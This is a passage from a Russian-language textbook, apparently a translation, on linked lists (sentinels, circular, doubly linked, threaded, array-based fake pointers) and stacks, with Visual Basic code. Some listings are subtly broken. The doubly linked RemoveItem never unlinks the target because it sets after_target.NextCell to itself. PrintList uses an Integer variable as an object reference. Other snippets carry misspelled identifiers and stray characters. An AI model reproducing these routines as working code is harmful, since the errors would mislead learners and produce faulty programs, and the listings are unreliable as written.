Простой связный список, показанный на рис. 2.2, обладает несколькими важными свойствами. Вопервых, можно очень легко добавить новую ячейку в начало списка. Установим указатель новой ячейки NextCell на текущую вершину списка. Затем установим указатель top_cell на новую ячейку. Рис. 2.3 соответствует этой операции. Код на языке Visual Basic для этой операции очень прост:
Set new_cell.NextCell = top_cell
Set top_cell = new_cell
@Рис. 2.3. Добавление элемента в начало связного списка
Сравните размер этого кода и кода, который пришлось бы написать для добавления нового элемента в начало списка, основанного на массиве, в котором потребовалось бы переместить все элементы массива на одну позицию, чтобы освободить место для нового элемента. Эта операция со сложностью порядка O(N) может потребовать много времени, если список достаточно длинный. Используя связный список, моно добавить новый элемент в начало списка всего за пару шагов.
======29
Так же легко добавить новый элемент и в середину связного списка. Предположим, вы хотите вставить новый элемент после ячейки, на которую указывает переменная after_me. Установим значение NextCell новой ячейки равным after_me.NextCell. Теперь установим указатель after_me.NextCell на новую ячейку. Эта операция показана на рис. 2.4. Код на Visual Basic снова очень прост:
Set new_cell.NextCell = after_me.NextCell
Set after_me.NextCell = new_cell
Удаление элементов из связного списка
Удалить элемент из вершины связного списка так же просто, как и добавить его. Просто установите указатель top_cell на следующую ячейку в списке. Рис. 2.5 соответствует этой операции. Исходный код для этой операции еще проще, чем код для добавления элемента.
Set top_cell = top_cell.NextCell
Когда указатель top_cell перемещается на второй элемент в списке, в программе больше не останется переменных, указывающих на первый объект. В этом случае, счетчик ссылок на этот объект станет равен нулю, и система автоматически уничтожит его.
Так же просто удалить элемент из середины списка. Предположим, вы хотите удалить элемент, стоящий после ячейки after_me. Просто установите указатель NextCell этой ячейки на следующую ячейку. Эта операция показана на рис. 2.6. Код на Visual Basic прост и понятен:
after_me.NextCell = after_me.NextCell.NextCell
@Рис. 2.4. Добавление элемента в середину связного списка
=======30
@Рис. 2.5. Удаление элемента из начала связного списка
Снова сравним этот код с кодом, который понадобился бы для выполнения той же операции, при использовании списка на основе массива. Можно быстро пометить удаленный элемент как неиспользуемый, но это оставляет в списке ненужные значения. Процедуры, обрабатывающие список, должны это учитывать, и соответственно быть более сложными. Присутствие чрезмерного количества «мусора» также замедляет работу процедуры, и, в конце концов, придется проводить чистку памяти.
При удалении элемента из связного списка, в нем не остается пустых промежутков. Процедуры, которые обрабатывают список, все так же обходят список с начала до конца, и не нуждаются в модификации.
Уничтожение связного списка
Можно предположить, что для уничтожения связного списка необходимо обойти весь список, устанавливая значение NextCell для всех ячеек равным Nothing. На самом деле процесс гораздо проще: только top_cell принимает значение Nothing.
Когда программа устанавливает значение top_cell равным Nothing, счетчик ссылок для первой ячейки становится равным нулю, и Visual Basic уничтожает эту ячейку.
Во время уничтожения ячейки, система определяет, что в поле NextCell этой ячейки содержится ссылка на другую ячейку. Поскольку первый объект уничтожается, то число ссылок на второй объект уменьшается. При этом счетчик ссылок на второй объект списка становится равным нулю, поэтому система уничтожает и его.
Во время уничтожения второго объекта, система уменьшает число ссылок на третий объект, и так далее до тех пор, пока все объекты в списке не будут уничтожены. Когда в программе уже не будет ссылок на объекты списка, можно уничтожить и весь список при помощи единственного оператора Set top_cell = Nothing.
@Рис. 2.6. Удаление элемента из середины связного списка
========31
Сигнальные метки
Для добавления или удаления элементов из начала или середины списка используются различные процедуры. Можно свести оба этих случая к одному и избавиться от избыточного кода, если ввести специальную сигнальную метку (sentinel) в самом начале списка. Сигнальную метку нельзя удалить. Она не содержит данных и используется только для обозначения начала списка.
Теперь вместо того, чтобы обрабатывать особый случай добавления элемента в начало списка, можно помещать элемент после метки. Таким же образом, вместо особого случая удаления первого элемента из списка, просто удаляется элемент, следующий за меткой.
Использование сигнальных меток пока не вносит особых различий. Сигнальные метки играют важную роль в гораздо более сложных алгоритмах. Они позволяют обрабатывать особые случаи, такие как начало списка, как обычные. При этом требуется написать и отладить меньше кода, и алгоритмы становятся более согласованными и более простыми для понимания.
В табл. 2.1 сравнивается сложность выполнения некоторых типичных операций с использованием списков на основе массивов со «сборкой мусора» или связных списков.
Списки на основе массивов имеют одно преимущество: они используют меньше памяти. Для связных списков необходимо добавить поле NextCell к каждому элементу данных. Каждая ссылка на объект занимает четыре дополнительных байта памяти. Для очень больших массивов это может потребовать больших затрат памяти.
Программа LnkList1 демонстрирует простой связный список с сигнальной меткой. Введите значение в текстовое поле ввода, и нажмите на элемент в списке или на метку. Затем нажмите на кнопку Add After (Добавить после), и программа добавит новый элемент после указанного. Для удаления элемента из списка, нажмите на элемент и затем на кнопку Remove After (Удалить после).
@Таблица 2.1. Сравнение списков на основе массивов и связных списков
=========32
Инкапсуляция связных списков
Программа LnkList1 управляет списком явно. Например, следующий код показывает, как программа удаляет элемент из списка. Когда подпрограмма начинает работу, глобальная переменная SelectedIndex дает положение элемента, предшествующего удаляемому элементу в списке. Переменная Sentinel содержит ссылку на сигнальную метку списка.
Private Sub CmdRemoveAfter_Click()
Dim ptr As ListCell
Dim position As Integer
If SelectedIndex < 0 Then Exit Sub
‘ Найти элемент.
Set ptr = Sentinel
position = SelectedIndex
Do While position > 0
position = position - 1
Set ptr = ptr.nextCell
Loop
‘ Удалить следуюший элемент.
Set ptr.NextCell = ptr.NextCell.NextCell
NumItems = NumItems - 1
SelectItem SelectedIndex ‘ Снова выбрать элемент.
DisplayList
NewItem.SetFocus
End Sub
Чтобы упростить использование связного списка, можно инкапсулировать его функции в классе. Это реализовано в программе LnkList2 . Она аналогична программе LnkList1, но использует для управления списком класс LinkedList.
Класс LinekedList управляет внутренней организацией связного списка. В нем находятся процедуры для добавления и удаления элементов, возвращения значения элемента по его индексу, числа элементов в списке, и очистки списка. Этот класс позволяет обращаться со связным списком почти как с массивом.
Это намного упрощает основную программу. Например, следующий код показывает, как программа LnkList2 удаляет элемент из списка. Только одна строка в программе в действительности отвечает за удаление элемента. Остальные отображают новый список. Сравните этот код с предыдущей процедурой:
Private sub CmdRemoveAfter_Click()
Llist.RemoveAfter SelectedIndex
SelectedItem SelectedList ‘ Снова выбрать элемент.
DisplayList
NewItem.SetFocus
CmdClearList.Enabled
End Sub
=====33
Доступ к ячейкам
Класс LinkedList, используемый программой LnkLst2, позволяет основной программе использовать список почти как массив. Например, подпрограмма Item, приведенная в следующем коде, возвращает значение элемента по его положению:
Function Item(ByVal position As Long) As Variant
Dim ptr As ListCell
If position < 1 Or position > m_NumItems Then
‘ Выход за границы. Вернуть NULL.
Item = Null
Exit Function
End If
‘ Найти элемент.
Set ptr = m_Sentinel
Do While position > 0
position = position - 1
Set ptr = ptr.NextCell
Loop
Item = ptr.Value
End Function
Эта процедура достаточно проста, но она не использует преимущества связной структуры списка. Например, предположим, что программе требуется последовательно перебрать все объекты в списке. Она могла бы использовать подпрограмму Item для поочередного доступа к ним, как показано в следующем коде:
Dim i As Integer
For i = 1 To LList.NumItems
‘ Выполнить какиелибо действия с LList.Item(i).
:
Next i
При каждом вызове процедуры Item, она просматривает список в поиске следующего элемента. Чтобы найти элемент I, программа должна пропустить I1 элементов. Чтобы проверить все элементы в списке из N элементов, процедура пропустит 0+1+2+3+…+N-1 =N*(N-1)/2 элемента. При больших N программа потеряет много времени на пропуск элементов.
Класс LinkedList может ускорить эту операцию, используя другой метод доступа. Можно использовать частную переменную m_CurrentCell для отслеживания текущей позиции в списке. Для возвращения значения текущего положения используется подпрограмма CurrentItem. Процедуры MoveFirst, MoveNext и EndOfList позволяют основной программе управлять текущей позицией в списке.
=======34
Например, следующий код содержит подпрограмму MoveNext:
Public Sub MoveNext()
‘ Если текущая ячейка не выбрана, ничего не делать.
If Not (m_CurrentCell Is Nothing) Then _
Set m_CurrentCell = m_CurrentCell.NextCell
End Sub
При помощи этих процедур, основная программа может обратиться ко всем элементам списка, используя следующий код. Эта версия несколько сложнее, чем предыдущая, но она намного эффективнее. Вместо того чтобы пропускать N*(N-1)/2 элементов и опрашивать по очереди все N элементов списка, она не пропускает ни одного. Если список состоит из 1000 элементов, это экономит почти полмиллиона шагов.
LList.MoveFirst
Do While Not LList.EndOfList
‘ Выполнить какиелибо действия над элементом LList.Item(i).
:
LList.MoveNext
Loop
Программа LnkList3 использует эти новые методы для управления связным списком. Она аналогична программе LnkList2, но более эффективно обращается к элементам. Для небольших списков, используемых в программе, эта разница незаметна. Для программы, которая обращается ко всем элементам большого списка, эта версия класса LinkedList более эффективна.
Разновидности связных списков
Связные списки играют важную роль во многих алгоритмах, и вы будете встречаться с ними на протяжении всего материала. В следующих разделах обсуждаются несколько специальных разновидностей связных списков.
Циклические связные списки
Вместо того, чтобы устанавливать указатель NextCell равным Nothing, можно установить его на первый элемент списка, образуя циклический список (circular list), как показано на рис. 2.7.
Циклические списки полезны, если нужно обходить ряд элементов в бесконечном цикле. При каждом шаге цикла, программа просто перемещает указатель на следующую ячейку в списке. Допустим, имеется циклический список элементов, содержащий названия дней недели. Тогда программа могла бы перечислять дни месяца, используя следующий код:
===========35
@Рис. 2.7. Циклический связный список
‘ Здесь находится код для создания и настройки списка и т.д.
:
‘ Напечатать календарь на месяц.
‘
‘ first_day — это индекс структуры, содержащей день недели для
‘ первого дня месяца. Например, месяц может начинаться
‘ в понедельник.
‘
‘ num_days — число дней в месяце.
Private Sub ListMonth(first_day As Integer, num_days As Integer)
Dim ptr As ListCell
Dim i As Integer
Set ptr = top_cell
For i = 1 to num_days
Print Format$(i) & ": " & ptr.Value
Set ptr = ptr.NextCell
Next I
End Sub
Циклические списки также позволяют достичь любой точки в списке, начав с любого положения в нем. Это вносит в список привлекательную симметрию. Программа может обращаться со всеми элементами списка почти одинаковым образом:
Private Sub PrintList(start_cell As Integer)
Dim ptr As Integer
Set ptr = start_cell
Do
Print ptr.Value
Set ptr = ptr.NextCell
Loop While Not (ptr Is start_cell)
End Sub
========36
Проблема циклических ссылок
Уничтожение циклического списка требует немного больше внимания, чем удаление обычного списка. Если вы просто установите значение переменной top_cell равным Nothing, то программа не сможет больше обратиться к списку. Тем не менее, поскольку счетчик ссылок первой ячейки не равен нулю, она не будет уничтожена. На каждый элемент списка указывает какойлибо другой элемент, поэтому ни один из них не будет уничтожен.
Это проблема циклических ссылок (circular referencing problem). Так как ячейки указывают на другие ячейки, ни одна из них не будет уничтожена. Программа не может получить доступ ни к одной из них, поэтому занимаемая ими память будет расходоваться напрасно до завершения работы программы.
Проблема циклических ссылок может встретиться не только в этом случае. Многие сети содержат циклические ссылки — даже одиночная ячейка, поле NextCell которой указывает на саму эту ячейку, может вызвать эту проблему.
Решение ее состоит в том, чтобы разбить цепь ссылок. Например, вы можете использовать в своей программе следующий код для уничтожения циклического связного списка:
Set top_cell.NextCell = Nothing
Set top_cell = Nothing
Первая строка разбивает цикл ссылок. В этот момент на вторую ячейку списка не указывает ни одна переменная, поэтому система уменьшает счетчик ссылок ячейки до нуля и уничтожает ее. Это уменьшает счетчик ссылок на третий элемент до нуля, и соответственно, он также уничтожается. Этот процесс продолжается до тех пор, пока не будут уничтожены все элементы списка, кроме первого. Установка значения top_cell элемента в Nothing уменьшает его счетчик ссылок до нуля, и последняя ячейка также уничтожается.
Двусвязные списки
Во время обсуждения связных списков вы могли заметить, что большинство операций определялось в терминах выполнения чеголибо после определенной ячейки в списке. Если задана определенная ячейка, легко добавить или удалить ячейку после нее или перечислить идущие за ней ячейки. Удалить саму ячейку, вставить новую ячейку перед ней или перечислить идущие перед ней ячейки уже не так легко. Тем не менее, небольшое изменение позволит облегчить и эти операции.
Добавим новое поле указателя к каждой ячейке, которое указывает на предыдущую ячейку в списке. Используя это новое поле, можно легко создать двусвязный список (doubly linked list), который позволяет перемещаться вперед и назад по списку. Теперь можно легко удалить ячейку, вставить ее перед другой ячейкой и перечислить ячейки в любом направлении.
@Рис. 2.8. Двусвязный список
============37
Класс DoubleListCell, который используется для таких типов списков, может объявлять переменные так:
Public Value As Variant
Public NextCell As DoubleListCell
Public PrevCell As DoubleListCell
Часто бывает полезно сохранять указатели и на начало, и на конец двусвязного списка. Тогда вы сможете легко добавлять элементы к любому из концов списка. Иногда также бывает полезно размещать сигнальные метки и в начале, и в конце списка. Тогда по мере работы со списком вам не нужно будет заботиться о том, работаете ли вы с началом, с серединой или с концом списка.
На рис. 2.9 показан двусвязный список с сигнальными метками. На этом рисунке неиспользуемые указатели меток NextCell и PrevCell установлены в Nothing. Поскольку программа опознает концы списка, сравнивая значения указателей ячеек с сигнальными метками, и не проверяет, равны ли значения Nothing, установка этих значений равными Nothing не является абсолютно необходимой. Тем не менее, это признак хорошего стиля.
Код для вставки и удаления элементов из двусвязного списка подобен приведенному ранее коду для односвязного списка. Процедуры нуждаются лишь в незначительных изменениях для работы с указателями PrevCell.
@Рис. 2.9. Двусвязный список с сигнальными метками
Теперь вы можете написать новые процедуры для вставки нового элемента до или после данного элемента, и процедуру удаления заданного элемента. Например, следующие подпрограммы добавляют и удаляют ячейки из двусвязного списка. Заметьте, что эти процедуры не нуждаются в доступе ни к одной из сигнальных меток списка. Им нужны только указатели на узел, который должен быть удален или добавлен и узел, соседний с точкой вставки.
Public Sub RemoveItem(ByVal target As DoubleListCell)
Dim after_target As DoubleListCell
Dim before_target As DoubleListCell
Set after_target = target.NextCell
Set before_target = target.PrevCell
Set after_target.NextCell = after_target
Set after_target.PrevCell = before_target
End Sub
Sub AddAfter (new_Cell As DoubleListCell, after_me As DoubleListCell)
Dim before_me As DoubleListCell
Set before_me = after_me.NextCell
Set after_me.NextCell = new_cell
Set new_cell.NextCell = before_me
Set before_me.PrevCell = new_cell
Set new_cell.PrevCell = after_me
End Sub
Sub AddBefore(new_cell As DoubleListCell, before_me As DoubleListCell)
Dim after_me As DoubleListCell
Set after_me = before_me.PrevCell
Set after_me.NextCell = new_cell
Set new_cell.NextCell = before_me
Set before_me.PrevCell = new_cell
Set new_cell.PrevCell = after_me
End Sub
===========39
Если снова взглянуть на рис. 2.9, вы увидите, что каждая пара соседних ячеек образует циклическую ссылку. Это делает уничтожение двусвязного списка немного более сложной задачей, чем уничтожение односвязных или циклических списков. Следующий код приводит один из способов очистки двусвязного списка. Вначале указатели PrevCell всех ячеек устанавливаются равными Nothing, чтобы разорвать циклические ссылки. Это, по существу, превращает список в односвязный. Когда ссылки сигнальных меток устанавливаются в Nothing, все элементы освобождаются автоматически, так же как и в односвязном списке.
Dim ptr As DoubleListCell
' Очистить указатели PrevCell, чтобы разорвать циклические ссылки.
Set ptr = TopSentinel.NextCell
Do While Not (ptr Is BottomSentinel)
Set ptr.PrevCell = Nothing
Set ptr = ptr.NextCell
Loop
Set TopSentinel.NextCell = Nothing
Set BottomSentinel.PrevCell = Nothing
Если создать класс, инкапсулирующий двусвязный список, то его обработчик события Terminate сможет уничтожать список. Когда основная программа установит значение ссылки на список равным Nothing, список автоматически освободит занимаемую память.
Программа DblLink работает с двусвязным списком. Она позволяет добавлять элементы до или после выбранного элемента, а также удалять выбранный элемент.
=============39
Потоки
В некоторых приложениях бывает удобно обходить связный список не только в одном порядке. В разных частях приложения вам может потребоваться выводить список сотрудников по их фамилиям, заработной плате, идентификационному номеру системы социального страхования, или специальности.
Обычный связный список позволяет просматривать элементы только в одном порядке. Используя указатель PrevCell, можно создать двусвязный список, который позволит перемещаться по списку вперед и назад. Этот подход можно развить и дальше, добавив больше указателей на структуру данных, позволяя выводить список в другом порядке.
Набор ссылок, который задает какойлибо порядок просмотра, называется потоком (thread), а сам полученный список — многопоточным списком (threaded list). Не путайте эти потоки с потоками, которые предоставляет система Windows NT.
Список может содержать любое количество потоков, хотя, начиная с какогото момента, игра не стоит свеч. Применение потока, упорядочивающего список сотрудников по фамилии, будет обосновано, если ваше приложение часто использует этот порядок, в отличие от расположения по отчеству, которое вряд ли когда будет использоваться.
Некоторые расположения не стоит организовывать в виде потоков. Например, поток, упорядочивающий сотрудников по полу, вряд ли целесообразен потому, что такое упорядочение легко получить и без него. Для того, чтобы составить список сотрудников по полу, достаточно просто обойти список по любому другому потоку, печатая фамилии женщин, а затем повторить обход еще раз, печатая фамилии мужчин. Для получения такого расположения достаточно всего двух проходов списка.
Сравните этот случай с тем, когда вы хотите упорядочить список сотрудников по фамилии. Если список не включает поток фамилий, вам придется найти фамилию, которая будет первой в списке, затем следующую и т.д. Это процесс со сложностью порядка O(N2), который намного менее эффективен, чем сортировка по полу со сложностью порядка O(N).
В общем случае, задание потока может быть целесообразно, если его необходимо часто использовать, и если при необходимости получить тот же порядок достаточно сложно. Поток не нужен, если его всегда легко создать заново.
Программа Treads демонстрирует простой многопоточный список сотрудников. Заполните поля фамилии, специальности, пола и номера социального страхования для нового сотрудника. Затем нажмите на кнопку Add (Добавить), чтобы добавить сотрудника к списку.
Программа содержит потоки, которые упорядочивают список по фамилии по алфавиту и в обратном порядке, по номеру социального страхования и специальности в прямом и обратном порядке. Вы можете использовать дополнительные кнопки для выбора потока, в порядке которого программа выводит список. На рис. 2.10 показано окно программы Threads со списком сотрудников, упорядоченным по фамилии.
Класс ThreadedCell, используемый программой Threads, определяет следующие переменные:
Public LastName As String
Public FirstName As String
Public SSN As String
Public Sex As String
Public JobClass As Integer
Public NextName As TreadedCell ‘ По фамилии в прямом порядке.
Public PrevName As TreadedCell ‘ По фамилии в обратном порядке.
Public NextSSN As TreadedCell ‘ По номеру в прямом порядке.
Public NextJobClass As TreadedCell ‘ По специальности в прямом порядке.
Public PrevJobClass As TreadedCell ‘ По специальности в обратном порядке.
Класс ThreadedList инкапсулирует многопоточный список. Когда программа вызывает метод AddItem, список обновляет свои потоки. Для каждого потока программа должна вставить элемент в правильном порядке. Например, для того, чтобы вставить запись с фамилией «Смит», программа обходит список, используя поток NextName, до тех пор, пока не найдет элемент с фамилией, которая должна следовать за «Смит». Затем она вставляет в поток NextName новую запись перед этим элементом.
При определении местоположения новых записей в потоке важную роль играют сигнальные метки. Обработчик событий Class_Initialize класса ThreadedList создает сигнальные метки на вершине и в конце списка и инициализирует их указатели так, чтобы они указывали друг на друга. Затем значение метки в начале списка устанавливается таким образом, чтобы оно всегда находилось до любого значения реальных данных для всех потоков.
Например, переменная LastName может содержать строковые значения. Пустая строка "" идет по алфавиту перед любыми действительными значениями строк, поэтому программа устанавливает значение сигнальной метки LastName в начале списка равным пустой строке.
Таким же образом Class_Initialize устанавливает значение данных для метки в конце списка, превосходящее любые реальные значения во всех потоках. Поскольку "~" идет по алфавиту после всех видимых символов ASCII, программа устанавливает значение поля LastName для метки в конце списка равным "~".
Присваивая полю LastName сигнальных меток значения "" и "~", программа избавляется от необходимости проверять особые случаи, когда нужно вставить новый элемент в начало или конец списка. Любые новые действительные значения будут находиться между значениями LastValue сигнальных меток, поэтому программа всегда сможет определить правильное положение для нового элемента, не заботясь о том, чтобы не зайти за концевую метку и не выйти за границы списка.
@Рис. 2.10. Программа Threads
=====41
Следующий код показывает, как класс ThreadedList вставляет новый элемент в потоки NextName и PrevName. Так как эти потоки используют один и тот же ключ — фамилии, программа может обновлять их одновременно.
Dim ptr As ThreadedCell
Dim nxt As ThreadedCell
Dim new_cell As New ThreadedCell
Dim new_name As String
Dim next_name As String
' Записать значения новой ячейки.
With new_cell
.LastName = LastName
.FirstName = FirstName
.SSN = SSN
•Sex = Sex
.JobClass = JobClass
End With
' Определить место новой ячейки в потоке NextThread.
new_name = LastName & ", " & FirstName
Set ptr = m_TopSentinel
Do
Set nxt = ptr.NextName
next_name = nxt.LastName & ", " & nxt.FirstName
If next_name >= new_name Then Exit Do
Set ptr = nxt
Loop
' Вставить новую ячейку в потоки NextName и prevName.
Set new_cell.NextName = nxt
Set new_cell.PrevName = ptr
Set ptr.NextName = new_cell
Set nxt.PrevName = new_cell
Чтобы такой подход работал, программа должна гарантировать, что значения новой ячейки лежат между значениями меток. Например, если пользователь введет в качестве фамилии "~~", цикл выйдет за метку конца списка, т.к. "~~" идет после "~". Затем программа аварийно завершит работу при попытке доступа к значению nxt.LastName, если nxt было установлено равным Nothing.
========42
Другие связные структуры
Используя указатели, можно построить множество других полезных разновидностей связных структур, таких как деревья, нерегулярные массивы, разреженные массивы, графы и сети. Ячейка может содержать любое число указателей на другие ячейки. Например, для создания двоичного дерева можно использовать ячейку, содержащую два указателя, один на левого потомка, и второй – на правого. Класс BinaryCell может состоять из следующих определений:
Public LeftChild As BinaryCell
Public RightChild As BinaryCell
На рис. 2.11 показано дерево, построенное из ячеек такого типа. В 6 главе деревья обсуждаются более подробно.
Ячейка может даже содержать коллекцию или связный список с указателями на другие ячейки. Это позволяет программе связать ячейку с любым числом других объектов. На рис. 2.12 приведены примеры других связных структур данных. Вы также встретите похожие структуры далее, в особенности в 12 главе.
Псевдоуказатели
При помощи ссылок в Visual Basic можно легко создавать связные структуры, такие как списки, деревья и сети, но ссылки требуют дополнительных ресурсов. Счетчики ссылок и проблемы с распределением памяти замедляют работу структур данных, построенных с использованием ссылок.
Другой стратегией, которая часто обеспечивает лучшую производительность, является применение псевдоуказателей (fake pointers). При этом программа создает массив структур данных. Вместо использования ссылок для связывания структур, программа использует индексы массива. Нахождение элемента в массиве осуществляется в Visual Basic быстрее, чем выборка его по ссылке на объект. Это дает лучшую производительность при применении псевдоуказателей по сравнению с соответствующими методами ссылок на объекты.
С другой стороны, применение псевдоуказателей не столь интуитивно, как применение ссылок. Это может усложнить разработку и отладку сложных алгоритмов, таких как алгоритмы сетей или сбалансированных деревьев.
@Рис. 2.11. Двоичное дерево
========43
@Рис. 2.12. Связные структуры
Программа FakeList управляет связным списком, используя псевдоуказатели. Она создает массив простых структур данных для хранения ячеек списка. Программа аналогична программе LnkList1, но использует псевдоуказатели.
Следующий код демонстрирует, как программа FakeList создает массив клеточных структур:
' Структура данных ячейки.
Type FakeCell
Value As String
NextCell As Integer
End Type
' Массив ячеек связного списка.
Global Cells(0 To 100) As FakeCell
' Сигнальная метка списка.
Global Sentinel As Integer
Поскольку псевдоуказатели — это не ссылки, а просто целые числа, программа не может использовать значение Nothing для маркировки конца списка. Программа FakeList использует постоянную END_OF_LIST, значение которой равно -32.767 для обозначения пустого указателя.
Для облегчения обнаружения неиспользуемых ячеек, программа FakeList также использует специальный «мусорный» список, содержащий неиспользуемые ячейки. Следующий код демонстрирует инициализацию пустого связного списка. В нем сигнальная метка NextCell принимает значение END_OF_LIST. Затем она помещает неиспользуемые ячейки в «мусорный» список.
========44
' Связный список неиспользуемых ячеек.
Global TopGarbage As Integer
Public Sub InitializeList()
Dim i As Integer
Sentinel = 0
Cells(Sentinel).NextCell = END_OF_LIST
' Поместить все остальные ячейки в «мусорный» список.
For i = 1 To UBound (Cells) - 1
Cells(i).NextCell = i + 1
Next i
Cells(UBound(Cells)).NextCell = END_OF_LIST
TopGarbage = 1
End Sub
При добавлении элемента к связному списку, программа использует первую доступную ячейку из «мусорного» списка, инициализирует поле ячейки Value и вставляет ячейку в список. Следующий код показывает, как программа добавляет элемент после выбранного:
Private Sub CmdAddAfter_Click()
Dim ptr As Integer
Dim position As Integer
Dim new_cell As Integer
' Найти место вставки.
ptr = Sentinel
position = Selectedlndex
Do While position > 0
position = position - 1
ptr = Cells(ptr).NextCell
Loop
' Выбрать новую ячейку из «мусорного» списка.
new_cell = TopGarbage
TopGarbage = Cells(TopGarbage).NextCell
' Вставить элемент.
Cells (new_cell).Value = NewItem.Text
Cells(new_cell).NextCell = Cells(ptr).NextCell
Cells(ptr).NextCell = new_cell
NumItems = NumItems + 1
DisplayList
SelectItem SelectedIndex + 1 ' Выбрать новый элемент.
NewItem.Text = ""
NewItem.SetFocus
CmdClearList.Enabled = True
End Sub
После удаления ячейки из списка, программа FakeList помещает удаленную ячейку в «мусорный» список, чтобы ее затем можно было легко использовать:
Private Sub CmdRemoveAfter_Click()
Dim ptr As Integer
Dim target As Integer
Dim position As Integer
If SelectedIndex < 0 Then Exit Sub
' Найти элемент.
ptr = Sentinel
position = SelectedIndex
Do While position > 0
position = position - 1
ptr = Cells(ptr).NextCell
Loop
' Пропустить следующий элемент.
target = Cells(ptr).NextCell
Cells(ptr).NextCell = Cells(target).NextCell
NumItems = NumItems - 1
' Добавить удаленную ячейку в «мусорный» список.
Cells(target).NextCell = TopGarbage
TopGarbage = target
SelectItem Selectedlndex ' Снова выбрать элемент.
DisplayList
CmdClearList.Enabled = NumItems > 0
NewItem.SetFocus
End Sub
Применение псевдоуказателей обычно обеспечивает лучшую производительность, но является более сложным. Поэтому имеет смысл сначала создать приложение, используя ссылки на объекты. Затем, если вы обнаружите, что программа значительную часть времени тратит на манипулирование ссылками, вы можете, если необходимо, преобразовать ее с использованием псевдоуказателей.
=======45-46
Резюме
Используя ссылки на объекты, вы можете создавать гибкие структуры данных, такие как связные списки, циклические связные списки и двусвязные списки. Эти списки позволяют легко добавлять и удалять элементы из любого места списка.
Добавляя дополнительные ссылки к классу ячеек, можно превратить двусвязный список в многопоточный. Развивая и дальше эти идеи, можно создавать экзотические структуры данных, включая разреженные массивы, деревья, хэштаблицы и сети. Они подробно описываются в следующих главах.
========47
Глава 3. Стеки и очереди
В этой главе продолжается обсуждение списков, начатое во 2 главе, и описываются две особых разновидности списков: стеки и очереди. Стек — это список, в котором добавление и удаление элементов осуществляется с одного и того же конца списка. Очередь — это список, в котором элементы добавляются в один конец списка, а удаляются с противоположного конца. Многие алгоритмы, включая некоторые из представленных в следующих главах, используют стеки и очереди.
Стеки
Стек (stack) — это упорядоченный список, в котором добавление и удаление элементов всегда происходит на одном конце списка. Можно представить стек как стопку предметов на полу. Вы можете добавлять элементы на вершину и удалять их оттуда, но не можете добавлять или удалять элементы из середины стопки.
Стеки часто называют списками типа первый вошел — последний вышел (LastInFirstOut list). По историческим причинам, добавление элемента в стек называется проталкиванием (pushing) элемента в стек, а удаление элемента из стека — выталкиванием (popping) элемента из стека.
Первая реализация простого списка на основе массива, описанная в начале 2 главы, является стеком. Для отслеживания вершины списка используется счетчик. Затем этот счетчик используется для вставки или удаления элемента из вершины списка. Небольшое изменение — это новая процедура Pop, которая удаляет элемент из списка, одновременно возвращая его значение. При этом другие процедуры могут извлекать элемент и удалять его из списка за один шаг. Кроме этого изменения, следующий код совпадает с кодом, приведенным во 2 главе.
Dim Stack() As Variant
Dim StackSize As Variant
Sub Push(value As Variant)
StackSize = StackSize + 1
ReDim Preserve Stack(1 To StackSize)
Stack(StackSize) = value
End Sub
Sub Pop(value As Variant)
value = Stack(StackSize)
StackSize = StackSize - 1
ReDim Preserve Stack(1 To StackSize)
End Sub
=====49
Все предыдущие рассуждения о списках также относятся к этому виду реализации стеков. В частности, можно сэкономить время, если не изменять размер при каждом добавлении или выталкивании элемента. Программа SimList на описанная во 2 главе, демонстрирует этот вид простой реализации списков.
Программы часто используют стеки для хранения последовательности элементов, с которыми программа будет работать до тех пор, пока стек не опустеет. Действия с одним из элементов может приводить к тому, что другие будут проталкиваться в стек, но, в конце концов, они все будут удалены из стека. В качестве простого примера можно привести алгоритм обращения порядка элементов массива. При этом все элементы последовательно проталкиваются в стек. Затем все элементы выталкиваются из стека в обратном порядке и записываются обратно в массив.
Dim List() As Variant
Dim NumItems As Integer
' Инициализация массива.
:
' Протолкнуть элементы в стек.
For I = 1 To NumItems
Push List(I)
Next I
' Вытолкнуть элементы из стека обратно в массив.
For I = 1 To NumItems
Pop List(I)
Next I
В этом примере, длина стека может многократно изменяться до того, как, в конце концов, он опустеет. Если известно заранее, насколько большим должен быть массив, можно сразу создать достаточно большой стек. Вместо изменения размера стека по мере того, как он растет и уменьшается, можно отвести под него память в начале работы и уничтожить его после ее завершения.
Следующий код позволяет создать стек, если заранее известен его максимальный размер. Процедура Pop не изменяет размер массива. Когда программа заканчивает работу со стеком, она должна вызвать процедуру EmptyStack для освобождения занятой под стек памяти.
======50
Const WANT_FREE_PERCENT = .1 ' 10% свободного пространства.
Const MIN_FREE = 10 ' Минимальный размер.
Global Stack() As Integer ' Стековый массив.
Global StackSize As Integer ' Размер стекового массива.
Global Lastltem As Integer ' Индекс последнего элемента.
Sub PreallocateStack(entries As Integer)
StackSize = entries
ReDim Stack(1 To StackSize)
End Sub
Sub EmptyStack()
StackSize = 0
LastItem = 0
Erase Stack ' Освободить память, занятую массивом.
End Sub
Sub Push(value As Integer)
LastItem = LastItem + 1
If LastItem > StackSize Then ResizeStack
Stack(LastItem) = value
End Sub
Sub Pop(value As Integer)
value = Stack(LastItem)
LastItem = LastItem - 1
End Sub
Sub ResizeStack()
Dim want_free As Integer
want_free = WANT_FREE_PERCENT * LastItem
If want_free < MIN_FREE Then want_free = MIN_FREE
StackSize = LastItem + want_free
ReDim Preserve Stack(1 To StackSize)
End Sub
Этот вид реализации стеков достаточно эффективен в Visual Basic. Стек не расходует понапрасну память, и не слишком часто изменяет свой размер, особенно если сразу известно, насколько большим он должен быть.
=======51
Множественные стеки
В одном массиве можно создать два стека, поместив один в начале массива, а другой — в конце. Для двух стеков используются отдельные счетчики длины стека Top, и стеки растут навстречу друг другу, как показано на рис. 3.1. Этот метод позволяет двум стекам расти, занимая одну и ту же область памяти, до тех пор, пока они не столкнутся, когда массив заполнится.
К сожалению, менять размер этих стеков непросто. При увеличении массива необходимо сдвигать все элементы в верхнем стеке, чтобы выделять память под новые элементы в середине. При уменьшении массива, необходимо вначале сдвинуть элементы верхнего стека, перед тем, как менять размер массива. Этот метод также сложно масштабировать для оперирования более чем двумя стеками.
Связные списки предоставляют более гибкий метод построения множественных стеков. Для проталкивания элемента в стек, он помещается в начало связного списка. Для выталкивания элемента из стека, удаляется первый элемент из связного списка. Так как элементы добавляются и удаляются только в начале списка, для реализации стеков такого типа не требуется применение сигнальных меток или двусвязных списков.
